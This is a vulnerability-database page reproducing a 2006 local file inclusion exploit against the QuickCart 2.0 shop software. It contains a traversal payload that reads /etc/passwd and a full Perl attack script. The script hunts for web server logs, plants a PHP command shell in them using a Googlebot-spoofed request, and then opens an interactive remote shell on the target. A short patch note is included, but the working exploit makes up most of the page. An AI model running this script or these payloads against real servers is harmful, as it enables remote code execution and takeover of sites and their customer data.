Vulners
Lucene search
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
===========================================================
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
===========================================================
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# #
# QuickCart 2.0 Local File Inclusion Exploit #
#################################################################################################
# Software: QuickCart 2.0 #
# #
# Vendor: http://opensolution.org/ #
# #
# Released: 2006/12/03 #
# #
# Critical: Moderately crtical #
# #
# Note: The information provided in this document is for Quick Cart administrator #
# testing purposes only! #
# #
# register_globals must be on #
# gpc_magic_quotes must be off #
# #
# actions_admin/categories.php?config[db_type]= #
# actions_admin/couriers.php?config[db_type]= #
# actions_admin/orders.php?config[db_type]= #
# actions_admin/products.php?config[db_type]= #
# actions_client/products.php?config[db_type]= #
# actions_client/orders.php?config[db_type]= #
# #
# Vulnerable code: #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php'; #
# #
# Patch: (Place this code at the top of every file) #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) #
# die(); #
# #
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00 #
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]= #
#################################################################################################
############################################################################
# Local File Inclusion Exploiter #
# #
# This script attempts to exploit a local file include vulnerability #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the #
# log files. A shell is then spawned. #
# #
# Created By r0ut3r (writ3r [at] gmail.com) #
############################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)
sub Header()
{
print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-------------------------------------------------------------------
};
}
sub Usage()
{
print q {Usage: localfilexpl.pl [target] [folder & vulnerable file]
[opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
exit();
}
Header();
if (!$target || !$vulnf) {
Usage(); }
@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);
@paths = ();
$dirs = 5;
$count = 0;
foreach $target (@targets)
{
for(0..$dirs){
$paths[$count+$_] = "../"x$_ . $target;
}
$count += $dirs;
}
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
#print "$path\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
while (<$sock>)
{
if (/<title>404 Not Found/)
{
print "[-] Vulnerable file not found! Exiting... \n";
exit();
}
if (/Permission denied/) {
print "[-] Log file found, but permission was denied
to read file. [".$path."] \n"; }
if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
{
if ($path ne $log) {
print "[+] Log file found! [".$path."] \n"; }
$log = $path;
}
}
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
$cmdfunct = "system";
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo
".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort =>
$port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;
$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";
while (<$xpl_test>)
{
if (/system\(\) has been disabled for security/)
{
print "[-] system() function is disabled. \n";
foreach $cmdfunct (@cmdfunctions)
{
if ($enabled_funct eq false)
{
print "[+] Trying ".$cmdfunct."()\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
$xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_retry "Host: $target\n";
print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl_retry "Accept: text/html\n";
print $xpl_retry "Connection: close\n\n\r\n";
while (<$xpl_retry>)
{
if (/b>: $cmdfunct\(\) has been disabled for security reasons/)
{
print "[-] ".$cmdfunct."() function is disabled. \n";
$enabled_funct = false;
last;
}
else
{
$enabled_funct = true;
}
}
if ($enabled_funct eq true)
{
print "[+] Enabled function found! [".$cmdfunct."]\n";
break;
}
}
}
if ($enabled_funct eq false) {
print "[-] No enabled cmd function found. Tried system(),
exec(), shell_exec(), passthru()\n"; exit(); }
}
}
print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
while ($cmd !~ "exit")
{
$scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)."
HTTP/1.1\n";
print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";
# prints output from command execution
if ($opt eq "-p")
{
while (<$scmd>)
{
print <$scmd>;
}
}
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
}
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2006 00:00Current
7.1High risk
Vulners AI Score7.1